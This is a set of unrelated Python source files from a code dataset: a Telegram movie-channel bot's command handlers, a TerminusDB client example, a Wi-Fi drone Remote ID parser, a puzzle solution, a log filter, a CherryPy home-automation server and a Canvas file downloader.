helper_func import encode, decode, get_messages\n\ndb = Database()\n\n\n@Client.on_message(filters.command([\"start\"]) & filters.private, group=1)\nasync def start(bot, update):\n    \n    try:\n        file_uid = update.command[1]\n    except IndexError:\n        file_uid = False\n    \n    if file_uid:\n        file_id, file_name, file_caption, file_type = await db.get_file(file_uid)\n        \n        # bail out if either piece of stored metadata is missing\n        if file_id is None or file_type is None:\n            return\n        \n        # fall back to the generated caption when no caption was stored\n        caption = file_caption if file_caption not in (\"\", None) else (\"File Name : \\n \" + \"\" + file_name + \"\" + \" \\n \\n \\n ❤️ 𝚃𝚑𝚊𝚗𝚔𝚢𝚘𝚞 𝙵𝚘𝚛 𝚄𝚜𝚒𝚗𝚐 𝙾𝚞𝚛 𝚂𝚎𝚛𝚟𝚒𝚌𝚎 𝙿𝚕𝚎𝚊𝚜𝚎 𝚂𝚞𝚙𝚙𝚘𝚛𝚝 𝚄𝚜 𝙱𝚢 𝚂𝚑𝚊𝚛𝚒𝚗𝚐 𝙾𝚞𝚛 𝙲𝚑𝚊𝚗𝚗𝚎𝚕/𝙶𝚛𝚘𝚞𝚙 𝙻𝚒𝚗𝚔 𝚃𝚘 𝚈𝚘𝚞𝚛 𝙵𝚛𝚒𝚎𝚗𝚍𝚜 \\n \\n ❁𝕁𝕠𝕚𝕟 𝕆𝕦𝕣 ℂ𝕙𝕒𝕟𝕟𝕖𝕝𝕤❁ \\n \\n ⟱⟱⟱⟱⟱⟱⟱⟱⟱⟱⟱⟱ \\n \\n 𝕮𝖍𝖆𝖓𝖓𝖊𝖑: @MoviE_LinkS_0nlY \\n ➻ 📌𝕮𝖍𝖆𝖓𝖓𝖊𝖑 : @BoX_0fFiCe \\n ➻ 👥𝕲𝖗𝖔𝖚𝖕 : @Mv_mania \\n ➻ 👥𝕲𝖗𝖔𝖚𝖕 : @agorimovies \\n \") \n        \n        if file_type == \"document\":\n            \n            await bot.send_document(\n                chat_id=update.chat.id,\n                document = file_id,\n                caption = caption,\n                parse_mode=\"html\",\n                reply_to_message_id=update.message_id,\n                reply_markup=InlineKeyboardMarkup(\n                    [\n                        [\n                            InlineKeyboardButton('𝚂𝙷𝙰𝚁𝙴🌐', url='https://t.me/share/url?url=💯%20𝙽𝙾%201%20𝙼𝙾𝚅𝙸𝙴%20𝚁𝙴𝚀𝚄𝙴𝚂𝚃𝙸𝙽𝙶%20𝙶𝚁𝙾𝚄𝙿%20𝙸𝙽%20𝚃𝙴𝙻𝙴𝙶𝚁𝙰𝙼%20✅%20%0A%0A𝙹𝙾𝙸𝙽%20𝙰𝙽𝙳%20𝚁𝙴𝚀%20𝚈𝙾𝚄𝚁%20𝙵𝙰𝚅𝙾𝚁𝙸𝚃𝙴%20𝙼𝙾𝚅𝙸𝙴𝚂%20𝚁𝙸𝙶𝙷𝚃%20𝙽𝙾𝚆%20%0A%0A💠%20➠%20𝙶𝚁𝙾𝚄𝙿%20:-%20@Mv_Mania%20%0A💠%20➠%20𝙲𝙷𝙰𝙽𝙽𝙴𝙻%20:-%20@BoX_0fFiCe%20%0A💠%20➠%20𝙲𝙷𝙰𝙽𝙽𝙴𝙻%20:-%20@MoviE_LinkS_0nlY')\n                        ],\n                        [\n                            InlineKeyboardButton('🎥𝙶𝚁𝙾𝚄𝙿', url='https://t.me/mv_mania'),\n                            InlineKeyboardButton('𝙲𝙷𝙰𝙽𝙽𝙴𝙻🎭', url='https://t.me/MoviE_LinkS_0nlY')\n                        ]\n                    ]\n                )\n            ) \n        \n        elif file_type == \"video\":\n            \n            await bot.send_video(\n                chat_id=update.chat.id,\n                video = file_id,\n                caption = caption,\n                parse_mode=\"html\",\n                reply_markup=InlineKeyboardMarkup(\n                    [\n                        [\n                            InlineKeyboardButton('𝚂𝙷𝙰𝚁𝙴🌐', url='https://t.me/share/url?url=💯%20𝙽𝙾%201%20𝙼𝙾𝚅𝙸𝙴%20𝚁𝙴𝚀𝚄𝙴𝚂𝚃𝙸𝙽𝙶%20𝙶𝚁𝙾𝚄𝙿%20𝙸𝙽%20𝚃𝙴𝙻𝙴𝙶𝚁𝙰𝙼%20✅%20%0A%0A𝙹𝙾𝙸𝙽%20𝙰𝙽𝙳%20𝚁𝙴𝚀%20𝚈𝙾𝚄𝚁%20𝙵𝙰𝚅𝙾𝚁𝙸𝚃𝙴%20𝙼𝙾𝚅𝙸𝙴𝚂%20𝚁𝙸𝙶𝙷𝚃%20𝙽𝙾𝚆%20%0A%0A💠%20➠%20𝙶𝚁𝙾𝚄𝙿%20:-%20@Mv_Mania%20%0A💠%20➠%20𝙲𝙷𝙰𝙽𝙽𝙴𝙻%20:-%20@BoX_0fFiCe%20%0A💠%20➠%20𝙲𝙷𝙰𝙽𝙽𝙴𝙻%20:-%20@MoviE_LinkS_0nlY')\n                        ],\n                        [\n                            InlineKeyboardButton('🎥𝙶𝚁𝙾𝚄𝙿', url='https://t.me/mv_mania'),\n                            InlineKeyboardButton('𝙲𝙷𝙰𝙽𝙽𝙴𝙻🎭', url='https://t.me/MoviE_LinkS_0nlY')\n                        ]\n                    ]\n                )\n            )\n        \n        elif file_type == \"audio\":\n            \n            await bot.send_audio(\n                chat_id=update.chat.id,\n                audio = file_id,\n                caption = caption,\n                parse_mode=\"html\",\n                reply_markup=InlineKeyboardMarkup(\n                    [\n                        [\n                            InlineKeyboardButton('𝚂𝙷𝙰𝚁𝙴🌐', url='https://t.me/share/url?url=💯%20𝙽𝙾%201%20𝙼𝙾𝚅𝙸𝙴%20𝚁𝙴𝚀𝚄𝙴𝚂𝚃𝙸𝙽𝙶%20𝙶𝚁𝙾𝚄𝙿%20𝙸𝙽%20𝚃𝙴𝙻𝙴𝙶𝚁𝙰𝙼%20✅%20%0A%0A𝙹𝙾𝙸𝙽%20𝙰𝙽𝙳%20𝚁𝙴𝚀%20𝚈𝙾𝚄𝚁%20𝙵𝙰𝚅𝙾𝚁𝙸𝚃𝙴%20𝙼𝙾𝚅𝙸𝙴𝚂%20𝚁𝙸𝙶𝙷𝚃%20𝙽𝙾𝚆%20%0A%0A💠%20➠%20𝙶𝚁𝙾𝚄𝙿%20:-%20@Mv_Mania%20%0A💠%20➠%20𝙲𝙷𝙰𝙽𝙽𝙴𝙻%20:-%20@BoX_0fFiCe%20%0A💠%20➠%20𝙲𝙷𝙰𝙽𝙽𝙴𝙻%20:-%20@MoviE_LinkS_0nlY')\n                        ],\n                        [\n                            InlineKeyboardButton('🎥𝙶𝚁𝙾𝚄𝙿', url='https://t.me/mv_mania'),\n                            InlineKeyboardButton('𝙲𝙷𝙰𝙽𝙽𝙴𝙻🎭', url='https://t.me/MoviE_LinkS_0nlY')\n                        ]\n                    ]\n                )\n            )\n\n        else:\n            print(file_type)\n        \n        return\n\n    \n    await bot.send_photo(\n        chat_id=update.chat.id,\n        photo=\"https://telegra.ph/file/fe403b72f9dd617f96441.jpg\",\n        caption=Translation.START_TEXT.format(\n            update.from_user.mention),\n        reply_markup=InlineKeyboardMarkup(\n            [\n                [\n                    InlineKeyboardButton(\"⚙️𝙷𝙴𝙻𝙿\", callback_data = \"ghelp\")\n                ],\n                [\n                    InlineKeyboardButton('🏘️𝙶𝚁𝙾𝚄𝙿', url='https://t.me/mv_mania'),\n                    InlineKeyboardButton('🎬𝙲𝙷𝙰𝙽𝙽𝙴𝙻', url='https://t.me/BoX_0fFiCe')\n                ],\n                [\n                    InlineKeyboardButton('🔎𝚄𝙿𝙳𝙰𝚃𝙴𝚂', url='https://t.me/MoviE_LinkS_0nlY'),\n                    InlineKeyboardButton('🗃️𝚂𝙾𝚄𝚁𝙲𝙴', callback_data = \"source_help\")\n                ]\n            ]\n        ), \n        parse_mode=\"html\",\n        
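# thread the greeting under the user's /start message\n        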
reply_to_message_id=update.message_id\n )\n\n\n@Client.on_message(filters.command([\"help\"]) & filters.private, group=1)\nasync def help(bot, update):\n \n await bot.send_message(\n chat_id=update.chat.id,\n text=Translation.HELP_USER,\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton('Auto Filter', callback_data = \"auto_fltr\"),\n InlineKeyboardButton('File Store', callback_data = \"file_saver\")\n ],\n [\n InlineKeyboardButton('Vc Player', callback_data = \"vcbots\"),\n InlineKeyboardButton('Filters', callback_data = \"filetr\")\n ],\n [\n InlineKeyboardButton('💬About', callback_data = \"about\")\n ]\n ]\n )\n )\n\n@Client.on_message(filters.text & ~ filters.command([\"start\",\"help\",\"batch\",\"genlink\",\"cccurrent\",\"userbotjoinchannel\",\"channelplay\",\"play\",\"dplay\",\"splay\",\"player\",\"skip\",\"pause\",\"resume\",\"end\",\"current\",\"playlist\",\"cresume\",\"cplayer\",\"cplaylist\",\"cdplay\",\"unset\",\"csplay\",\"cplay\",\"pmpermit\",\"gcast\",\"userbotleaveall\",\"userbotjoin\",\"admincache\",\"remall\",\"rem\",\"viewfilters\",\"filter\",\"info\",\"set\",\"sets\",\"id\",\"status\"]) & filters.private & ~ filters.me)\nasync def note(bot, update):\n buttons = [[\n InlineKeyboardButton('🏡𝙼𝙰𝙸𝙽 𝙲𝙷𝙰𝙽𝙽𝙴𝙻', url='https://t.me/MoviE_LinkS_0nlY'),\n InlineKeyboardButton('📽️𝙼𝙾𝚅𝙸𝙴 𝙲𝙷𝙰𝙽𝙽𝙴𝙻', url ='https://t.me/BoX_0fFiCe')\n ],[\n InlineKeyboardButton('🤔𝙷𝙾𝚆 𝚃𝙾 𝚁𝙴𝚀?', url='https://t.me/MoviE_LinkS_0nlY/5')\n ],[\n InlineKeyboardButton('𝚂𝙷𝙰𝚁𝙴 𝚃𝙾 𝚈𝙾𝚄𝚁 𝙵𝚁𝙸𝙴𝙽𝙳𝚂😍', url='https://t.me/share/url?url=💯%20𝙽𝙾%201%20𝙼𝙾𝚅𝙸𝙴%20𝚁𝙴𝚀𝚄𝙴𝚂𝚃𝙸𝙽𝙶%20𝙶𝚁𝙾𝚄𝙿%20𝙸𝙽%20𝚃𝙴𝙻𝙴𝙶𝚁𝙰𝙼%20✅%20%0A%0A𝙹𝙾𝙸𝙽%20𝙰𝙽𝙳%20𝚁𝙴𝚀%20𝚈𝙾𝚄𝚁%20𝙵𝙰𝚅𝙾𝚁𝙸𝚃𝙴%20𝙼𝙾𝚅𝙸𝙴𝚂%20𝚁𝙸𝙶𝙷𝚃%20𝙽𝙾𝚆%20%0A%0A💠%20➠%20𝙶𝚁𝙾𝚄𝙿%20:-%20@Mv_Mania%20%0A💠%20➠%20𝙲𝙷𝙰𝙽𝙽𝙴𝙻%20:-%20@BoX_0fFiCe%20%0A💠%20➠%20𝙲𝙷𝙰𝙽𝙽𝙴𝙻%20:-%20@MoviE_LinkS_0nlY')\n \n ]]\n \n reply_markup = InlineKeyboardMarkup(buttons)\n\n if update.from_user.id not in ADMINS:\n await bot.send_message(\n chat_id=update.chat.id,\n text=Translation.REQ_IN_PM,\n reply_markup=reply_markup,\n parse_mode=\"html\",\n reply_to_message_id=update.message_id\n )\n \n","repo_name":"VasuDevbyte/Bandersnatch","sub_path":"Commands(4).py","file_name":"Commands(4).py","file_ext":"py","file_size_in_byte":9406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9655948073","text":"from terminusdb_client import WOQLClient\nfrom terminusdb_client.woqlschema import WOQLSchema, DocumentTemplate, LexicalKey\n\nuser = \"jimbo\"\nteam = \"logicistics\" # My team name.\nendpoint = f\"https://cloud.terminusdb.com/{team}/\"\nclient = WOQLClient(endpoint)\n\nclient.connect(user=user, team=team, use_token=True)\n\nclient.create_database(\"example_db\")\n\nschema = WOQLSchema()\n\nclass Player(DocumentTemplate):\n _schema = schema\n _key = LexicalKey([\"name\"])\n name: str\n position: str\n \nschema.commit(client, commit_msg = \"Adding Player Schema\")\n\nobjects = [\n Player(name=\"George\", position=\"Centre Back\"),\n Player(name=\"Doug\", position=\"Full Back\"),\n Player(name=\"Karen\", position=\"Centre Forward\")\n ]\n\nclient.insert_document(objects, commit_msg = f\"Inserting player data\")\n\ndocuments = client.get_all_documents()\n\n# documents comes back as a iterable that can be convert into a list\nprint(\"All documents\")\nprint(list(documents))\n\nprint(\"=============\")\n\n# getting a specific document by id\nplayer_doug = client.get_document(\"Player/Doug\")\nprint(\"Specific document\")\nprint(player_doug)\n\n\nmatches = client.query_document({\"@type\" : 
\"Player\",\n \"position\": \"Full Back\"})\n\n# matches comes back as a iterable that can be convert into a list\nprint(list(matches))\n","repo_name":"terminusdb/terminusdb-docs","sub_path":"code-examples/start-with-client/getting-started.py","file_name":"getting-started.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"47611062483","text":"import logging\n\nfrom scapy.layers.dot11 import Dot11Beacon, Dot11EltVendorSpecific\nfrom scapy.packet import Packet\n\nfrom info_handler import save_drone_info\nfrom parser_handler import DefaultHandler, DjiHandler, AsdStanHandler\nfrom parsers import Parser\n\nhandler = AsdStanHandler(DjiHandler(DefaultHandler(None)))\nhome_locations = {}\n\n\ndef filter_frames(packet: Packet) -> None:\n \"\"\"\n Method to filter Wi-Fi frames. Only frames containing a vendor specific element will not be filtered out\n directly. After the first filter a second one is applied which checks if an OUI of the vendor specific elements\n belongs to a format of an implemented handler. If not, it will be dismissed and the next Wi-Fi frame passes through\n the same filter logic.\n\n Args:\n packet (Packet): Wi-Fi frame.\n \"\"\"\n #if packet.haslayer(Dot11Beacon): # Monitor 802.11 beacon traffic\n if packet.haslayer(Dot11EltVendorSpecific): # check vendor specific ID -> 221\n vendor_spec: Dot11EltVendorSpecific = packet.getlayer(Dot11EltVendorSpecific)\n while vendor_spec:\n layer_oui = Parser.dec2hex(vendor_spec.oui)\n if handler.is_drone(layer_oui):\n # parse header\n remote_id = handler.parse(vendor_spec.info, layer_oui)\n if remote_id:\n serial = remote_id.serial_number\n logging.info(f\"Parsed Remote ID with serial number for: {serial}\")\n\n remote_id.add_home_loc(home_locations)\n logging.info(f\"Remote ID: {remote_id}\")\n\n save_drone_info(remote_id)\n break\n else:\n vendor_spec: Dot11EltVendorSpecific = vendor_spec.payload.getlayer(Dot11EltVendorSpecific)\n continue\n","repo_name":"cyber-defence-campus/RemoteIDReceiver","sub_path":"Receiver/backend/dronesniffer/drone_sniffer.py","file_name":"drone_sniffer.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"77"} +{"seq_id":"33551449371","text":"data=[2,0,6,12,1,3]\n\n#data=[0,3,6]\nlastNum = data[0]\nmem = {}\nfor i,d in enumerate(data):\n lastNum = d\n mem.setdefault(d,[]).append(i+1)\n \n \nturns = 30000000\n#turns = 2020\ndef findOccurences(data, val):\n res = []\n for i in range(len(data)-1,-1,-1):\n if data[i] == val:\n res.append(i+1)\n if len(res) >=2:\n break\n return res\n\n\nfor i in range(len(data),turns):\n if lastNum in mem:\n if len(mem[lastNum]) < 2: \n lastNum = 0\n else:\n lastNum = mem[lastNum][-1]-mem[lastNum][-2]\n mem.setdefault(lastNum,[]).append(i+1) \n \nprint(lastNum)\n","repo_name":"zac112/adventOfCode","sub_path":"code2020/day15/p2.py","file_name":"p2.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"73199606648","text":"from datetime import datetime\n\n\ndef get_logs(start_interv, end_interv, logs):\n chosen_logs = []\n for i in range(start_interv, end_interv + 1):\n if i in logs:\n value = logs[i]\n chosen_logs.append(value)\n return set(chosen_logs)\n\n\ndef main():\n with open('logs_timestamp.csv', 'r') as fopen:\n content = fopen.read()\n\n intro = \"\"\"\n Format: day-month-year 
hour:minutes\n \"\"\"\n print(intro)\n start = input(\"Please provide the start time:\\t\")\n start_date = datetime.strptime(start, '%d-%m-%Y %H:%M')\n start_timestamp = datetime.timestamp(start_date)\n end = input(\"Please provide the end time:\\t\")\n end_date = datetime.strptime(end, '%d-%m-%Y %H:%M')\n end_timestamp = datetime.timestamp(end_date)\n\n some_logs = {}\n\n content = content.split('\\n')\n for l in content:\n if l != '':\n line = l.split(',')\n\n some_logs[int(line[0])] = line[1].strip().replace(\"'\", \"\")\n\n print(int(start_timestamp))\n print(int(end_timestamp))\n\n chosen_logs = get_logs(int(start_timestamp), int(end_timestamp), some_logs)\n print(chosen_logs)\n\nif __name__ == '__main__':\n main()","repo_name":"FlyingMedusa/PythonCourse","sub_path":"ChristmasExtras/04some_logs.py","file_name":"04some_logs.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37800705183","text":"webPort = 80\nwebRestPort = 7478\nwebUpdateInterval = 1\nwebPageTitle = \"Home Automation\"\n\ninsideTemp = \"kitchenTemp\"\noutsideTemp = \"deckTemp\"\npoolTemp = \"waterTemp\"\n\nimport cherrypy\nimport json\nfrom jinja2 import Environment, FileSystemLoader\nfrom ha.HAClasses import *\nfrom haWebViews import *\n\nclass WebRoot(object):\n def __init__(self, resources, env, cache, stateChangeEvent, resourceLock):\n self.resources = resources\n self.env = env\n self.cache = cache\n self.stateChangeEvent = stateChangeEvent\n self.resourceLock = resourceLock\n \n # Everything \n @cherrypy.expose\n def index(self, group=None):\n debug('debugWeb', \"/\", \"get\", group)\n try:\n groups = [group.capitalize()]\n details = False\n except:\n groups = [\"Time\", \"Temperature\", \"Hvac\", \"Services\", \"Pool\", \"Lights\", \"Doors\", \"Water\", \"Solar\", \"Power\", \"Cameras\", \"Tasks\"]\n details = True\n with self.resourceLock:\n reply = self.env.get_template(\"default.html\").render(title=webPageTitle, script=\"\", \n groups=[[group, self.resources.getGroup(group)] for group in groups],\n views=views,\n details=details)\n return reply\n\n # Tacoma \n @cherrypy.expose\n def tacoma(self):\n debug('debugWeb', \"/\", \"get\")\n with self.resourceLock:\n reply = self.env.get_template(\"tacoma.html\").render(title=webPageTitle, script=\"\", \n group=self.resources.getGroup(\"Tacoma\"),\n views=views)\n return reply\n\n # Solar \n @cherrypy.expose\n def solar(self, action=None, resource=None):\n debug('debugWeb', \"/solar\", \"get\", action, resource)\n with self.resourceLock:\n inverters = self.resources.getGroup(\"Inverters\")\n optimizers = self.resources.getGroup(\"Optimizers\")\n latitude = \"%7.3f \"%(abs(latLong[0])+.0005)+(\"N\" if latLong[0]>0 else \"S\")\n longitude = \"%7.3f \"%(abs(latLong[1])+.0005)+(\"E\" if latLong[1]>0 else \"W\")\n reply = self.env.get_template(\"solar.html\").render(script=\"\",\n dayOfWeek=self.resources.getRes(\"theDayOfWeek\"),\n date=self.resources.getRes(\"theDate\"),\n time=self.resources.getRes(\"theTime\"),\n ampm=self.resources.getRes(\"theAmPm\"),\n sunrise=self.resources.getRes(\"sunrise\"),\n sunset=self.resources.getRes(\"sunset\"),\n latitude=latitude, longitude=longitude,\n airTemp=self.resources.getRes(outsideTemp),\n inverterTemp=self.resources.getRes(\"inverterTemp\"), \n roofTemp=self.resources.getRes(\"roofTemp\"), \n currentLoad=self.resources.getRes(\"currentLoad\"), \n currentPower=self.resources.getRes(\"currentPower\"), \n 
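# cumulative production counters rendered alongside the live readings\n                                                           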
todaysEnergy=self.resources.getRes(\"todaysEnergy\"), \n lifetimeEnergy=self.resources.getRes(\"lifetimeEnergy\"), \n inverters=inverters, \n optimizers=optimizers, \n views=views)\n return reply\n\n # iPad - 1024x768 \n @cherrypy.expose\n def ipad(self, action=None, resource=None):\n debug('debugWeb', \"/ipad\", \"get\", action, resource)\n with self.resourceLock:\n reply = self.env.get_template(\"ipad.html\").render(script=\"\", \n time=self.resources.getRes(\"theTime\"),\n ampm=self.resources.getRes(\"theAmPm\"),\n day=self.resources.getRes(\"theDay\"),\n pooltemp=self.resources.getRes(poolTemp),\n intemp=self.resources.getRes(insideTemp),\n outtemp=self.resources.getRes(outsideTemp),\n groups=[[\"Pool\", self.resources.getResList([\"spaTemp\"])], \n [\"Lights\", self.resources.getResList([\"porchLights\", \"bbqLights\", \"backYardLights\", \"poolLight\", \"spaLight\"])], \n# [\"Lights\", self.resources.getResList([\"xmasTree\", \"xmasCowTree\", \"xmasLights\"])], \n [\"Shades\", self.resources.getResList([\"allShades\", \"shade1\", \"shade2\", \"shade3\", \"shade4\"])], \n [\"Hvac\", self.resources.getResList([\"southHeatTempTarget\", \"northHeatTempTarget\"])], \n [\"Sprinklers\", self.resources.getResList([\"backLawnSequence\", \"gardenSequence\", \"sideBedSequence\", \"frontLawnSequence\"])]\n ],\n views=views)\n return reply\n\n # iPhone 5 - 320x568 \n @cherrypy.expose\n def iphone5(self, action=None, resource=None):\n debug('debugWeb', \"/iphone5\", \"get\", action, resource)\n with self.resourceLock:\n reply = self.env.get_template(\"iphone5.html\").render(script=\"\", \n time=self.resources.getRes(\"theTime\"),\n ampm=self.resources.getRes(\"theAmPm\"),\n temp=self.resources.getRes(outsideTemp),\n resources=self.resources.getResList([\"spaTemp\", \"xmasTree\", \"xmasCowTree\", \"porchLights\", \"xmasLights\", \"allShades\", \"shade1\", \"shade2\", \"shade3\", \"shade4\", \"backLawn\", \"backBeds\", \"garden\", \"sideBeds\", \"frontLawn\"]),\n views=views)\n return reply\n\n # iPhone 3GS - 320x480 \n @cherrypy.expose\n def iphone3gs(self, action=None, resource=None):\n debug('debugWeb', \"/iphone3gs\", \"get\", action, resource)\n with self.resourceLock:\n reply = self.env.get_template(\"iphone3gs.html\").render(script=\"\", \n time=self.resources.getRes(\"theTime\"),\n ampm=self.resources.getRes(\"theAmPm\"),\n day=self.resources.getRes(\"theDay\"),\n temp=self.resources.getRes(outsideTemp),\n resources=self.resources.getResList([\"porchLights\", \"xmasLights\", \"bedroomLights\", \"recircPump\", \"garageDoors\", \"houseDoors\"]),\n views=views)\n return reply\n\n # get or set a resource state\n @cherrypy.expose\n def cmd(self, resource=None, state=None):\n debug('debugWeb', \"/cmd\", \"get\", resource, state)\n try:\n if resource == \"resources\":\n reply = \"\"\n for resource in self.resources.keys():\n if resource != \"states\":\n reply += resource+\"\\n\"\n return reply\n else:\n if state:\n self.resources.getRes(resource).setViewState(state, views)\n time.sleep(1) # hack\n return json.dumps({\"state\": self.resources.getRes(resource).getViewState(views)})\n except:\n return \"Error\" \n\n # Return the value of a resource attribute\n @cherrypy.expose\n def value(self, resource=None, attr=None):\n try:\n if resource:\n if attr:\n return self.resources.getRes(resource).__getattribute__(attr).__str__()\n else:\n return self.resources.getRes(resource).dict().__str__()\n except:\n return \"Error\" \n\n # Update the states of all resources\n @cherrypy.expose\n def state(self, 
_=None):\n debug('debugWebUpdate', \"state\", cherrypy.request.remote.ip)\n return self.updateStates(self.resources.getRes(\"states\").getState())\n \n # Update the states of resources that have changed\n @cherrypy.expose\n def stateChange(self, _=None):\n debug('debugWebUpdate', \"stateChange\", cherrypy.request.remote.ip)\n debug('debugInterrupt', \"update\", \"event wait\")\n self.stateChangeEvent.wait()\n debug('debugInterrupt', \"update\", \"event clear\")\n self.stateChangeEvent.clear()\n return self.updateStates(self.resources.getRes(\"states\").getStateChange())\n\n # return the json to update the states of the specified collection of sensors\n def updateStates(self, resourceStates):\n staticTypes = [\"time\", \"ampm\", \"date\", \"W\", \"KW\"] # types whose class does not depend on their value\n tempTypes = [\"tempF\", \"tempFControl\", \"tempC\", \"spaTemp\"] # temperatures\n if self.cache:\n cacheTime = self.cache.cacheTime\n else:\n cacheTime = 0\n updates = {\"cacheTime\": cacheTime}\n for resource in resourceStates.keys():\n try:\n resState = self.resources.getRes(resource).getViewState(views)\n resClass = self.resources.getRes(resource).type\n if resClass in tempTypes:\n updates[resource] = (\"temp\", resState, tempColor(resState))\n else:\n if resClass not in staticTypes:\n resClass += \"_\"+resState\n updates[resource] = (resClass, resState, \"\")\n except:\n pass\n debug('debugWebUpdate', \"states\", len(updates))\n return json.dumps(updates)\n \n # Submit \n @cherrypy.expose\n def submit(self, action=None, resource=None):\n debug('debugWeb', \"/submit\", \"post\", action, resource)\n self.resources.getRes(resource).setViewState(action, views)\n reply = \"\"\n return reply\n\ndef webInit(resources, restCache, stateChangeEvent, resourceLock):\n # set up the web server\n baseDir = os.path.abspath(os.path.dirname(__file__))\n globalConfig = {\n 'server.socket_port': webPort,\n 'server.socket_host': \"0.0.0.0\",\n }\n appConfig = {\n '/css': {\n 'tools.staticdir.on': True,\n 'tools.staticdir.root': os.path.join(baseDir, \"static\"),\n 'tools.staticdir.dir': \"css\",\n },\n '/js': {\n 'tools.staticdir.on': True,\n 'tools.staticdir.root': os.path.join(baseDir, \"static\"),\n 'tools.staticdir.dir': \"js\",\n },\n '/images': {\n 'tools.staticdir.on': True,\n 'tools.staticdir.root': os.path.join(baseDir, \"static\"),\n 'tools.staticdir.dir': \"images\",\n },\n '/favicon.ico': {\n 'tools.staticfile.on': True,\n 'tools.staticfile.filename': os.path.join(baseDir, \"static/favicon.ico\"),\n },\n } \n cherrypy.config.update(globalConfig)\n root = WebRoot(resources, Environment(loader=FileSystemLoader(os.path.join(baseDir, 'templates'))), restCache, stateChangeEvent, resourceLock)\n cherrypy.tree.mount(root, \"/\", appConfig)\n if not webLogging:\n access_log = cherrypy.log.access_log\n for handler in tuple(access_log.handlers):\n access_log.removeHandler(handler)\n cherrypy.engine.timeout_monitor.unsubscribe()\n cherrypy.engine.autoreload.unsubscribe()\n cherrypy.engine.start()\n\n","repo_name":"raelinamarie/ha","sub_path":"haWeb.py","file_name":"haWeb.py","file_ext":"py","file_size_in_byte":11452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23957784996","text":"\"\"\"\nCanvasSync by Mathias Perslev\nFebruary 2017\n\n--------------------------------------------\n\nImplements a class representing files not located on the Canvas server\nInitialization of this object thus does not require a info dictionary as is the case 
for all classes representing true\nCanvas entities. Instead, LinkedFile should be initialized with a direct download link.\nHowever, the LinkedFile is derived from the base entity class and the walk, sync and show methods are implemented\nand should be used in a similar fashion to other CanvasEntities objects.\n\nAn Assignment object is the parent object.\n\nSee developer_info.txt file for more information on the class hierarchy of CanvasEntities objects.\n\n\"\"\"\n\n# Future imports\nfrom __future__ import print_function\n\n# Inbuilt modules\nimport os\nimport sys\n\n# Third party modules\nimport requests\nfrom six import text_type\n\n# CanvasSync module imports\nfrom CanvasSync.entities.canvas_entity import CanvasEntity\nfrom CanvasSync.utilities.ANSI import ANSI\n\n\nclass LinkedFile(CanvasEntity):\n def __init__(self, download_url, parent):\n \"\"\"\n Constructor method, initializes base CanvasEntity class\n\n download_url : string | A URL pointing to a file somewhere on the web\n parent : object | The parent object, an Assignment object\n \"\"\"\n\n self.download_url = download_url\n self.valid_url = True\n\n # Get the potential file name from the URL\n # OBS: We do not correct the name in this class, as we need to use the length of the name to determine\n # if the link is valid.\n file_name = os.path.split(download_url)[-1]\n\n # File path\n file_path = parent.get_path() + file_name\n\n # No file extension or weirdly long filename will not be allowed\n # (this is not strictly necessary as the regex should only match OK URLs)\n if not os.path.splitext(file_name)[-1] or len(file_name) > 60:\n self.valid_url = False\n\n # Initialize base class\n CanvasEntity.__init__(self,\n id_number=-1,\n name=file_name,\n sync_path=file_path,\n parent=parent,\n folder=False,\n identifier=u\"linked_file\")\n\n def __repr__(self):\n \"\"\" String representation, overwriting base class method \"\"\"\n return u\" \" * 15 + u\"| \" + u\"\\t\" * self.indent + u\"%s: %s\" % (ANSI.format(u\"Linked File\",\n formatting=u\"linkedfile\"),\n self.name)\n\n def url_is_valid(self):\n return self.valid_url\n\n def print_status(self, status, color, overwrite_previous_line=False):\n \"\"\" Print status to console \"\"\"\n\n if overwrite_previous_line:\n # Move up one line\n sys.stdout.write(ANSI.format(u\"\", formatting=u\"lineup\"))\n sys.stdout.flush()\n\n print(ANSI.format(u\"[%s]\" % status, formatting=color) + str(self)[len(status) + 2:])\n sys.stdout.flush()\n\n def download(self):\n \"\"\"\n Download the file, returns True or False depecting if the file was downloaded or not. 
Returns -1 if the file\n was attempted downloaded but failed.\n \"\"\"\n if os.path.exists(self.sync_path):\n return False\n\n self.print_status(u\"DOWNLOADING\", color=u\"blue\")\n\n # Attempt to download the file\n try:\n response = requests.get(self.download_url)\n except Exception:\n # Could not download, catch any exception\n self.print_status(u\"FAILED\", u\"red\", overwrite_previous_line=True)\n return -1\n\n # Check for OK 200 HTTP response\n if not response.status_code == 200:\n self.print_status(u\"FAILED\", u\"red\", overwrite_previous_line=True)\n return -1\n\n # If here, download was successful, write to disk and print status\n with open(self.sync_path, u\"wb\") as out_file:\n out_file.write(response.content)\n\n return True\n\n def walk(self, counter):\n \"\"\" Stop walking, endpoint \"\"\"\n print(text_type(self))\n\n counter[0] += 1\n return\n\n def sync(self):\n \"\"\"\n Attempt to download a file a the url 'download_url' to the path 'path'/filename while printing\n the status using an indent of print_indent to align with the parent object\n \"\"\"\n was_downloaded = self.download()\n\n if was_downloaded != - 1:\n self.print_status(u\"SYNCED\", color=u\"green\", overwrite_previous_line=was_downloaded)\n\n def show(self):\n \"\"\" Show the folder hierarchy by printing every level \"\"\"\n print(text_type(self))\n","repo_name":"perslev/CanvasSync","sub_path":"CanvasSync/entities/linked_file.py","file_name":"linked_file.py","file_ext":"py","file_size_in_byte":4856,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"77"} +{"seq_id":"75093019449","text":"import unittest\n\n\nclass MyTestCase(unittest.TestCase):\n def test_something(self):\n self.assertEqual(True, False)\n\n\nif __name__ == '__main__':\n unittest.main()\n\ndef main():\n log(green(\"PASS\"), \"Import mnist project\")\n try:\n check_get_mnist()\n check_closed_form()\n check_svm()\n check_compute_probabilities()\n check_compute_cost_function()\n 